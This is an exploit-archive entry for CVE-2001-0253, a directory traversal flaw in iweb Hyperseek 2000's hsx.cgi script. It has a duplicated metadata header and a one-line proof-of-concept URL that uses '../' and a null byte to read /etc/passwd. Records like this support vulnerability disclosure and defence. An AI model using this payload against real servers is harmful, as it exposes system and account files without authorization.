iweb hyperseek 2000 - Directory Traversal
| EKU-ID: 26149 | CVE: CVE-2001-0253;OSVDB-498 | OSVDB-ID: |
| Author: MC GaN | Published: 2001-01-28 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 26149 | CVE: CVE-2001-0253;OSVDB-498 | OSVDB-ID: |
| Author: MC GaN | Published: 2001-01-28 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/2314/info A specially crafted URL, composed of '../' and '%00', will disclose the directory listing and files of the target with read permissions. http://target/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/passwd%00